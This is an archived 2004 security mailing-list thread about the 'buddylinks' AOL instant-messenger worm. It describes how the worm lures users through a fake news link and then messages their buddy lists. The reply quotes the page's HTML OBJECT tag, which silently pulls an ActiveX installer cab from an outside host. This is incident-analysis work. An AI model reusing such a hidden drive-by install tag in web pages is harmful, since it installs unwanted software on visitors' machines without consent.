RE: buddylinks worm
From: Jeremy Junginger (jj_at_act.com)
Date: 02/10/04
- Previous message: Jason Yates: "buddylinks worm"
- Maybe in reply to: Jason Yates: "buddylinks worm"
- Next in thread: Jason Yates: "Re: buddylinks worm"
- Reply: Jason Yates: "Re: buddylinks worm"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "Jason Yates" <jaywhy2@comcast.net>, <incidents@securityfocus.com> Date: Tue, 10 Feb 2004 15:57:55 -0700
Yep! It actually uses the follwing method:
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001
">
</OBJECT>
To install ShellINstaller.INF (Size: 2,119) and ShellInstaller.ocx (Size
81,920), which is an ActiveX control. That's all I've found so far. Let me
know if you guys find anything else.
-Jeremy
-----Original Message-----
From: Jason Yates [mailto:jaywhy2@comcast.net]
Sent: Tuesday, February 10, 2004 2:58 PM
To: incidents@securityfocus.com
Subject: buddylinks worm
Another one of the AOL worms; this one instant messages all users on
your buddy list. The message I've recieved is "check this out:
http://ww.wgutv.com/osama_capture.php?bNek". The link is a fact news
website telling you to download some software . Once you install the
software on the page; it immediately instant messages everyone on your
buddy list.
The software it installs is something called buddylinks. According to
buddylinks.net, Buddylinks is a "revolutionary new way for instant
messenger users to instantaneously share entertaining content with their
entire IM "buddy list" network all at one time". I can't make this
stuff up.
Jason Yates
---------------------------------------------------------------------------
Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection
Protect your network with the comprehensive security solution that integrates
six applications for ease of use and lower TCO.
Firewall - Virus protection - Spam protection - URL blocking - VPN
- Wireless security.
Download 30-day evaluation at:
http://www.astaro.com/php/contact/securityfocus.php
----------------------------------------------------------------------------
This e-mail message and all attachments transmitted with it may be confidential
and are intended solely for the addressee(s). If you are not the intended recipient
or the person responsible for delivering it to the intended recipient, you are
hereby notified that any reading, dissemination, distribution, copying, or other
use of this message or its attachment(s) is strictly prohibited. If you receive
this email in error, please immediately notify the sender of the message or
Best Software, Inc. by e-mailing postmaster@bestsoftware.com and destroy all copies
of this message. Best Software, for the protection of our internal systems and
those of our customers, does block most email attachments.
---------------------------------------------------------------------------
Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection
Protect your network with the comprehensive security solution that
integrates six applications for ease of use and lower TCO.
Firewall - Virus protection - Spam protection - URL blocking - VPN
- Wireless security.
Download 30-day evaluation at:
http://www.astaro.com/php/contact/securityfocus.php
----------------------------------------------------------------------------
- Previous message: Jason Yates: "buddylinks worm"
- Maybe in reply to: Jason Yates: "buddylinks worm"
- Next in thread: Jason Yates: "Re: buddylinks worm"
- Reply: Jason Yates: "Re: buddylinks worm"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
